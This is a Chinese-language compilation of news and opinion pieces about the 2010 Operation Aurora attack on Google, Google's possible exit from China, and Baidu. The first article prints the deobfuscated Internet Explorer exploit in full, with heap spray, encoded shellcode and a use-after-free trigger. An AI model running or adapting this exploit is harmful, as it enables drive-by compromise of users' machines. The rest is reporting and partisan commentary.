行业新闻

TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明,承认McAfee所说的IE漏洞才是祸源。

文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下:

【去混淆后的代码】

 

Evals

  • var n = unescape("%u0c0d%u0c0d");
    while (n.length = 524288)n += n;
    n = n.substring(0, 524269 - sc.length);
    var x = new Array();
    for (var i = 0; i  200; i ++ ){
      x[i] = n + sc;
    }
    
    (repeated 1 time)

Writes

 

  1. htmlscriptvar sc = unescape("  
  2. %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805  
  3. %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2  
  4. %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053  
  5. %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8  
  6. %ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8  
  7. %u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2  
  8. %ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f  
  9. %udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7  
  10. %ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727  
  11. %u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6  
  12. %u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923  
  13. %ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2  
  14. %ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8  
  15. %u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8  
  16. %ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820  
  17. %udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8  
  18. %u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854  
  19. %ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84  
  20. %ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4  
  21. %ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153  
  22. %u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30  
  23. %ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e  
  24. %u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b  
  25. %u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb  
  26. %u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c  
  27. %u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498  
  28. %ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0  
  29. %ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc  
  30. %u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8  
  31. %u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038  
  32. %ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e  
  33. %u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727  
  34. %u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703  
  35. %uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653  
  36. %udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5  
  37. %u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb  
  38. %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be  
  39. %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7  
  40. %ubcb9%ub2f6%ubfa8%u00d8");  
  41. var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,   
  42. 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,   
  43. 728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,   
  44. 350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,   
  45. 805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,   
  46. 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,   
  47. 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,   
  48. 735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,   
  49. 735, 651, 427, 770, 301, 805, 693, 413, 875);  
  50. var arr = new Array;  
  51. for (var i = 0; i  sss.length; i ++ ){  
  52.   arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cccc=cc.replace(/ ,/ g, ""  
  53.   );  
  54.   cccc = cc.replace(/@/g, ",");  
  55.   eval(cc);  
  56.   var x1 = new Array();  
  57.   for (i = 0; i  200; i ++ ){  
  58.     x1[i] = document.createElement("COMMENT");  
  59.     x1[i].data = "abc";  
  60.   }  
  61.   ;  
  62.   var e1 = null;  
  63.   function ev1(evt){  
  64.     e1 = document.createEventObject(evt);  
  65.     document.getElementById("sp1").innerHTML = "";  
  66.     window.setInterval(ev2, 50);  
  67.   }  
  68.   function ev2(){  
  69.     p = "  
  70. \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
  71. \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
  72. \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";  
  73.     for (i = 0; i  x1.length; i ++ ){  
  74.       x1[i].data = p;  
  75.     }  
  76.     ;  
  77.     var t = e1.srcElement;  
  78.   }  
  79. /scriptspan id="sp1"IMG SRC="aaa.gif" onload="ev1(event)"/span/body/html  

(repeated 1 time)

微软也发布了对这个漏洞的更新分析,表明Windows XP上的IE 6最为危险。值得一提的是,文章特别感谢了CSDN专家博客暨《程序员》杂志专栏作者、微软中国的褚诚云。我们会尽快邀请褚诚云写出更深入的分析文章。

还有专家用视频演示了攻击过程。

此前,《连线》杂志文章给出了大量攻击细节。

文章引述McAfee公司的话,说(攻击Google的)黑客使用了前所未有的战术,组合了加密、隐秘编程技术和IE中的未知漏洞,意图是窃取Google、Adobe和许多其他大公司的源代码。

该公司威胁研究副总裁Dmitri Alperovitch说:在国防工业之外,我们从未见过商业行业的公司遭受过如此复杂程度的攻击。

Alperovitch说,攻击者使用了十几种恶意代码和多层次的加密,深深地挖掘进了公司网络内部,并巧妙掩盖自己的活动。在掩饰攻击和防范常规侦测方法上,他们的加密非常成功。我们从未见过这种水平的加密。非常高超。

McAfee之所以将这种攻击命名为Aurora(极光),是因为他们发现,黑客在将恶意代码编译为可执行文件时,编译器将攻击者机器上的路径名插入了代码中。

在IE漏洞被曝光后,微软很快发布了针对性的安全建议书。而McAfee也在其产品中增加了侦测这种攻击所用恶意代码的功能。

虽然最初的攻击始自公司雇员访问恶意网站,但是研究人员还在试图确定网站的URL是通过邮件、聊天程序还是其他方式,比如Facebook或者其他社会化网站。

当用户访问恶意网站的时候,他们的IE浏览器将被袭击,自动而且秘密地下载一系列恶意代码到计算机中。这些代码就像俄罗斯套娃那样,一个跟着一个地下载到系统中。

Alperovitch表示,最初的攻击代码是经过三次加密的shell code,用来激活漏洞挖掘程序。然后它执行从外部机器下载的程序,后者也是加密的,而且会从被攻击机器上删除第一个程序。这些加密的二进制文件将自己打包为几个也被加密的可执行文件。

其中一个恶意程序会打开一个远程后门,建立一个加密的秘密通道,伪装为一个SSL链接以避免被侦测到。这样攻击者就可以对被攻击机器进行访问,将它作为滩头阵地,继续进攻网络上的其他部分,搜索登录凭据、知识产权和其他要找的东西。

McAfee因参与攻击调查,从被攻击公司那里得到了攻击所用的一些恶意代码副本,并在几天前加强了自己的产品。

对于另一家安全企业iDefense之前所说的有些攻击使用了Trojan.Hydraq木马,Alperovitch表示,他发现的恶意代码此前任何反病毒厂商都不知道。

iDefense还说攻击者使用了恶意PDF附件和Adobe PDF程序的漏洞,而Alperovitch说,他调查的公司里没有发现这种情况。但他表示攻击不同公司的方法可能不同,不限于IE漏洞。

当黑客进入系统后,他们将数据发送给位于美国伊利诺伊州和得克萨斯州以及中国台湾的指挥控制服务器。Alperovitch没有指明牵涉到这次攻击的美国境内系统,也没有提到攻击者的战果。但Rackspace报告他们无意中在攻击中发挥了少量作用。而iDefense则表示攻击者的目标是许多公司的源码库,而且很多情况下都成功得手。

Alperovitch说攻击看上去是从12月15日开始的,但也有可能更早。似乎结束于1月4日,那一天,用来与恶意代码传输数据的指挥控制服务器被关闭。

他说:我们不知道服务器是由攻击者关闭的,还是其他组织关闭的。但是从那时起,攻击停止了。

Alperovitch还指出,攻击的时机非常好,是在假日期间,公司的运营中心和安全响应团队人手很少。攻击的复杂程度令人印象深刻,是那种此前仅针对国防工业的攻击类型。一般对于商业部门,攻击只是为了获取财务方面的信息,通常是通过SQL注入攻击公司的网站,或者攻击公司不安全的无线网络。网络罪犯一般不会花大量的时间把攻击精雕细刻到如此程度,每个方面都采取混淆/加密防范。

McAfee还掌握了更多攻击细节,但目前不准备公布。他们已经与美国执法部门合作,并将这一问题告知美国各级政府。


近日,Google退华事件引来各方评论,有技术方面的,政治方面的,当然也有商业方面的,Havas Media Lab的主管Umair Haque也在哈佛商学院评论网站上发文表达了自己的看法。

以下为节选翻译:

一座丘陵,一个峡谷,和一个云雾缭绕的山峰。闭上你的眼睛,想象一个倾斜的字母“M”。那就是有利地位新的形状。而最近Google与中国的小冲突就是最好的例子。

一边是资本主义工业时代;另一边,则是下一代资本主义的有利地位。二十世纪和二十一世纪的鸿沟,将其明显的区别开来的。

对垄断和完全控制的追求那已经是上一时期的优势,但中国仍像激光束般盯着这些。中国的这些行为是商学院教科书上的经典黑色艺术。通过大量的分配,大量的诉讼,更强的排外性,廉价的快速消费品,庞大的现金储蓄,导致了优势的增加。

但是目前的优势所在已经改变了。道德优势成为了新的有利地位。这无关于是否获得更多,这关乎做得更好。这无关于出口保护策略,向消费者和生产者施加压力,让他们买这买那。而这是关乎让人民,群众,社会真正地富裕起来。这无关于不关心他人,而是关乎关爱得更多。这无关于无情冷酷,而关乎真诚、可靠。

这才是Google不愿被中国的政策玩弄的原因。道德优势并不仅仅可以打造更强的品牌、让诚信度更高。还能为打造更好的组织,市场和经济立下基础:

更强的商业,更多没有被工作所麻木的热情的群众。
更强的目标,为了更高的需求而奋斗,而不是降低目标。
更强的战略,对二十世纪类的高压政策和边缘政策有更大的反弹力。
能创造更有意义的价值。
更强的管理,更着重于长远利益。
能选择更好的投资者——诚信的,忠诚的长期投资者,而不仅仅是为了快速赚钱的投机者。
更强的经济,而非使经济衰退,这可以让人们享受一个更诚信的繁荣的社会生活。
二十世纪的优势能让中国造就一些诸如微软、福特和Gaps这样的企业(一些工业时代的企业,生产一些工业时代的产品,并按工业时代的规则经营)。我们现在知道这些故事的结局了,因为我们现在生活在一个经济,政治,社会和自然世界停滞的年代。

Google的成功在于他的企业文化中道德占有优势。而对某些事物妥协对于Google伤害巨大:诸如品牌,战略,引起内讧,企业价值的降低。而更严重的是,它让Google陷入竞争的恶性循环。Google应该更多地参与政府招标,还是做一个类似于百度那样的国家拥护的冠军?

道德方面的优势有可能是优势的最终成因。这是为什么更好的分配、产品、市场、定价形成的原因,而这些正是优势产生的直接原因。Jim Chanos的投资报告说到:离开道德优势,我们无法创造新的企业价值,而旧的企业价值不是长久之计。

是时候来改朝换代了。今日的挑战并非是盲目的创建一个国家、企业。这是为了一个高速连接的世界而重新构思的新体系。谋求一个道德优势是建设性的资本主义的测试。Google做到了。而中国就像迪拜,俄罗斯和以前的特大企业一样,并没有成功。


附上哈佛商业评论原文

Google, China, and the New High Ground of Advantage

A hill, a giant chasm, and a cloud-covered peak. Close your eyes and picture a lopsided "M" for a second. That's the new landscape of advantage. And the recent skirmish between Google and China is its best example yet.

On one side is the old high ground of the industrial era capitalism; on the other, the new high(er) ground of next-generation capitalism. The yawning chasm in between them is the gap between the 20th century and the 21st.

Currency intervention, breaking Copenhagen, crackdowns , collusion, corruption, coercion, and censorship: China's ongoing bad behavior as global citizen is, when we connect the dots, the gigantic elephant in the world's boardroom. What's driving it?

The quest for monopoly, monopsony, and control. That's yesterday's high ground, and China's focused like a laser beam on it. China's moves are the textbook stuff of b-school's blackest arts. Through larger distribution, fiercer litigation, greater exclusivity, cheaper and faster production, a bigger cash pile, advantage is gained.

But the high ground has shifted. The new high ground is an ethical edge. It's not about having more; it's about doing better. It's not about protecting exports, pressuring buyers and suppliers, price discriminating against the powerless, and programming consumers to buy, buy, buy — it's about making people, communities, and society authentically better off. It's not about caring less — but caring more. It's not about ruthlessness. It's about mindfulness.

That's the real lesson of Google's refusal to play by China's rules. An ethical edge doesn't just build stronger brands, though added cred is certainly a benefit. Rather, it lays new foundations for better organizations, markets, and economies:

It builds stronger businesses, full of more passionate people, who aren't deadened by their work.
It builds stronger purpose, striving towards a higher calling — not just a lowest common denominator.
It builds stronger strategies, more resilient to 20th century-style coercion and brinksmanship.
It builds thicker, more meaningful value.
It builds stronger management, more focused on the long-run.
It selects better investors — engaged, committed, long-run investors, not just speculators looking for a quick buck.
And it builds stronger economies, that can, instead of stagnating, enjoy an authentic prosperity.
The 20th century high ground might let China build a few dozen Microsofts, Fords, and Gaps: industrial-era companies that make industrial-era stuff — and play by industrial-era rules. Yawn. We know how that story ends, because we're living it: an economy, polity, society, and natural world in stagnation and decline. Dear Wen Jiabao: want fries with that Zombieconomy?

The only way to step past the industrial era's zombified endgame is the new high ground, because only an ethical edge can do all the good stuff above. The old high ground was built for 20th century economics: sell more junk, earn more profit, "grow" — and then crash. An ethical edge operates at a higher economic level. It is concerned with what we sell, how profits are earned, and which authentic, human benefits "grow." It's a concept built for the economics of an interdependent world.

It's an ethical edge (no, not ethical perfection) that's always been at the heart of Google's disruptive success. Compromising its ethical edge cost Google in all the ways above, damaging its brand, diluting its purpose, causing internal strife, creating thinner value. Most damaging, compromising its ethical edge left Google trapped in an impossible, vicious cycle of competitive dynamics: to "compete," should it do the government's bidding even more than quasi-state-sponsored champions, like Baidu?

Wall Street, in typically myopic fashion, thinks Google's crazy — who doesn't want to make a buck? But the Street gets real economics less than my pet hamster does. Not every marginal dollar is created equal. The benefits from the effects above steeply outweigh the pennies Google was earning. Instead, a Google that doesn't play by China's rules is a better business, which creates thicker, more sustainable, more meaningful value. And, increasingly, it's thick value that the smart money rewards — and reaps lasting rewards from. No wonder, then, that Wall Street legend Jim Chanos is betting against China's unsustainable, artificial growth.

An ethical edge just might be the ultimate cause of advantage. It's how better distribution, production, marketing, and pricing — all just proximate causes of advantage — ultimately happen. Jim Chanos's investment thesis says: without an ethical edge, new value cannot be created — old value can only be shuffled around (hi, Wall Street).

Ethical edge is advantage reconceived for the 21st century. It's an institutional innovation: the institution of "advantage" rebuilt for a threadbare, fraying, global economy. It's a radical new definition of "advantage" that blows past the stale, tired idea of competitive advantage.

It's time for a great reboot. Today's great challenge isn't blindly building countries, companies, or households on a broken set of institutions. It is reimagining new institutions for a hyperconnected world. Answering that challenge begins, from my tiny perspective, with an ethical edge as the cornerstone of every kind of organization. Seeking an ethical edge is the truest test of a Constructive Capitalist. Google just passed it. China — like Dubai, Russia, and yesterday's mega-corporations — is failing it spectacularly.

So here's the single question everyone should be asking. The old high ground is the new low ground. Yesterday's mountain is today's valley. Are you ascending to the new high ground?

Fire away in the comments with questions, thoughts, or examples.
 

 

http://blogs.hbr.org/haque/2010/01/google_china_and_the_new_high.html


“幸福来得太快。”在谷歌尚未明确是否就此退出中国市场之际,百度员工已经赤裸裸地趁火打劫:如今百度负责广告销售的员工一早来到公司后的第一件事,就是列出谷歌的广告客户名单,开始逐个联系,百度人得意地说,“我们内部调侃这是捡钱计划。”差不多同时,百度首席产品设计师孙云丰在博客上公开撰文辱骂:(关于谷歌退出中国)“整个事情给我的唯一感受,就是恶心”、“证明google是个市侩分子。”

姑且不论孙云丰的观点是非对错,如果孙云丰代表百度骂谷歌,那他就严重地缺乏职业道德,辱骂竞争对手显然不是一家公众上市公司高管之所为能事;如果孙云丰代表自己骂谷歌公司,那么就有义务接受谷歌用户的回应和批评。可惜的是孙云丰一方面宣称自己观点毫无错误,另一方面,他又赶紧删掉了自己的文章并且四处要求删贴。也有人说删贴未必是他自己的意愿。那么,作为宣称“有道德感”的百度员工,孙云丰不应该屈从别人的意见删掉自己认为正确的东西。作为百度高管,孙云丰更不应该允许百度公关去打电话要求别人删贴。

新浪微博上有网友评论说,“单从商业价值和经济利益方面考量,都可以看出Google的不作恶,并不是作秀的口号。对于一个靠信息有序化赚钱的公司,必须要不作恶才行。百度正好相反,必须要作恶才行。”这句话说到点子上,谷歌退就退吧,百度未必就能继续一股独大。即使暂时抢下更大份额,如果不改变或者提升哪怕是一个世侩也该有的道德底气,百度终有一天遭世人唾弃。

当然,曾经我也经常使用百度,享受其便利搜索的同时也关注其成长。我曾一直很期待百度能成为一家负有责任感的道德公司,就像他们新编《壹百度》里所鼓吹的那样。遗憾的是,从百度高管到员工,似乎都没和这家公司一样完成这种道德上的转变。不要武断地以为我是在挟公器而泄私愤。以我跑IT线的最近两年跟百度人打交道的直观感受就是,百度严重地缺乏公关沟通原则并且势利:为了掩盖其负面新闻,百度公关可以不惜千里飞来又是许诺又是找高层拉关系;一旦目的达到或者遭拒,其公关团队转瞬就变得傲慢十足。

从最近频频曝出网友投诉百度上充斥恶意诽谤攻击他人名誉的网页链接可见一斑。百度不仅没有履行道德公司所必须的制止不良信息散播责任,却是为了暖味眼球和暴利空间,选择最大限度地纵容和助长这类恶意传播扩大化,给被侵权人带来更大的伤害。可悲的是,百度不以为耻反以为荣,似有将此恶习死扛到底的趋势。

“百度搜索引擎的核心价值就在于在网络空间里自由地抓取信息,靠信息有序化进行商业运作。”百度公关高管们不止一次地辩称,技术上无法屏蔽掉恶意诽谤信息。但如果以此逃避散播诽谤网贴的责任,那么,累积起百度巨大财富将李彦宏推上首富的百度竞价排名又作何解?那些活跃在百度线上线下,以收钱删贴的公司又是如何的生存?更近的例子是,如今百度上搜索孙云丰骂谷歌的贴子,缘何毫无例外地全部显示“页面无法访问”?百度何必如此掩耳盗铃。

百度原本可以更幸福的,他完全可以把商业价值建立在一个正确的价值观之上。谷歌的退出,无疑让百度迎来商业搜索史上可遇不可求的机遇,很不幸,百度根本不愿这么做。

作者:戴远程


Google recently announced that its China based location was the victim of an attack that targeted and compromised a critical internal system used to track the email accounts of those on China’s watch list. The system was designed to comply with government warrants for information concerning Chinese human rights activists. Some suspect China of targeting this specific system to circumvent the official warrant process in order to collect data on other Chinese citizens [1].

More alarmingly, this attack was not exclusively directed at Google. In all, at least 34 companies including Yahoo, Symantec, Northrop Grumman, Dow Chemical, Washington-based think tanks, and assorted human rights advocacy groups were compromised by the spear phishing attack [2].
At first rumored to be another Adobe flaw, closer examination by McAfee Labs revealed that the attack (code named “Aurora”) was actually a sophisticated zero-day vulnerability exploit against Microsoft’s Internet Explorer [3].
What should be most worrisome is not the zero-day in all versions of IE, but the new crop of “advanced persistent threats” that are siphoning money and intellectual property. These APTs are professionally organized, have extensive funding and employ smart people. The result: triple encrypted shell code which downloads multiple encrypted binaries used to drop an encrypted payload on a target machine which then establishes an encrypted SSL channel to connect to a command and control network [4]. This is serious stuff.
Only a few years ago the majority of web-based attacks seemed to be launched by individuals or small groups to collect credit card information. These attacks had serious consequences, but the magnitude of the losses and the organization of the black market economy were still child's play by today's standards.
Current threats from the Eastern bloc are directed at massive monetary gain - probably in the area of tens of millions of dollars [5]. China appears hell bent on stealing state secrets and intellectual property from both governments and private business alike. The stakes are much higher, and the bad guys are much more capable of pulling off the heist.
China
We have known for a long time that China is engaged in actively sponsoring espionage. However, the focused targeting of private business is a newer, more sophisticated and lucrative threat. These spear phishing attacks are intensely researched and aimed at top-level executives, and will become more common as time passes.
In a directly related point, consider the curious appearance of a new website called iiScan. This service (based in China) offers to scan your web application for vulnerabilities - for FREE. Just sign up and point their software to your website, and they will, ‘figure out’ how vulnerable to an attack you might be. After the scan is done, they will email you a PDF based report to your email account.
Wow. This service sounds like an overwhelmingly bad idea. It doesn’t take much to imagine all the things that could go wrong in this scenario, even if the Chinese government didn’t directly fund targeted attacks, IE didn’t have multiple zero-day exploits, and a proof of concept embedded malicious PDF exploit had not just been released. Can you say ‘Beijing Cocktail’?
It might very well turn out that NOSEC Technologies Co., Ltd. (the company behind iiScan) may be legitimate, or at least may have started out that way. Even if they are not actively attacking websites, it shouldn’t take long for them to become a high profile target for either private hackers, or for the Chinese government itself. What would be a better target than a database full of public websites and their known vulnerabilities? These sites, if not already compromised by iiScan, could be used as command and control drones, payload hosts, pieces of a distributed file-system, or merely SPAM relay channels.
Education and Armament
Every day adds more proof that web application threats are being crafted by motivated professional organizations with deep pockets. Security needs to be taken very seriously, practiced diligently, and all users need to be paranoid when surfing the web. This is especially important because the media is very cautious about reporting all the gory details of the real impact of cybercrime [6].
Installing preventative software is a good idea, too. Some of the latest tools and devices may help to prevent drive-by malware, spear phishing payloads, etc. Install Firefox and use plug-ins that flag suspected malware host sites. Use a personal web proxy, and restrict evil IPs. You can get the most comprehensive list of Korean and Chinese blocks (including iptables, htaccess files, dns zones, etc) from this page. Above all, stop clicking on those emails from your least technical friends that include an attached PowerPoint or PDF file to deliver a punch line. The villains take the Internet very seriously, and so should you.

http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/01/15/china-google-and-web-security.aspx


据McAfee周五表示,导致谷歌电子邮件系统被大陆神秘黑客攻破的IE浏览器0-day漏洞最近已经被泄露到了网上.与此同时,德国联邦安全局也于同日发布了一则声明,提醒德国人民在IE推出安全补丁前暂时不要使用这款浏览器.

McAfee的CTO George Kurtz在自己博客上的发帖显示:他们的研究人员在邮件列表中发现了有关的攻击代码,并确认称目前至少有一个网站已经公布了有关的漏洞攻击代码.他并表示:"McAfee本周早些时候便已经发现了这样的攻击代码,并已经将这些代码提交给了微软.不过这次泄露出来的攻击代码和我们提交的内容竟然完全一样."

"这些代码被公布于众之后,类似的针对IE的攻击会很快在网上流传开来."Kurtz写道:"不法分子可以利用这条公开的代码来攻击Windows操作系统。而且不少流行的渗透测试工具中也已经加入了测试这个漏洞的功能。"

本周四微软就该漏洞发布了警告信息,并称他们正在修补这个漏洞。根据微软的警告,该漏洞可影响包括Windows7在内的各款流行Windows操作系统中的IE6/7/8程序.他们还宣称使用IE6的用户将是漏洞攻击者的首要攻击对象.

谷歌本周二曾对外宣布称发现有大陆黑客正利用这种漏洞对自己和其它几家美国公司发起攻击,另外谷歌同时还表示攻击的目标还包括多位私人用户的Gmail邮箱.

据谷歌表示,去年12月份中期他们便发现有此类攻击行为出现,尽管谷歌并没有明确指出这种攻击是否是在指使下进行的.但他们随后表示,由于遭受了这种肆意攻击,因此他们准备退出中国市场.据熟知此事件内情的人士表示,这次针对谷歌的攻击所使用的攻击代码,与不久前针对几家美国公司所发起的攻击非常类似。

据透露,在这次攻击谷歌的事件中,有超过30家的美国硅谷企业开发的专利源代码被窃。Adobe公司已经确认称自己也是受害者之一,另据透露雅虎,赛门铁克,Juniper,诺斯罗普格鲁曼(Northrop Grumman)以及陶氏化学公司(Dow Chemical)也是这次攻击的受害者。

McAfee表示,在分析了这些ie漏洞攻击代码之后,他们发现攻击者将这次攻击行动命名为“曙光行动”(Aurora),同时这次攻击所使用的手法可谓相当高明。

CNBeta编译
原文:
cnet
 


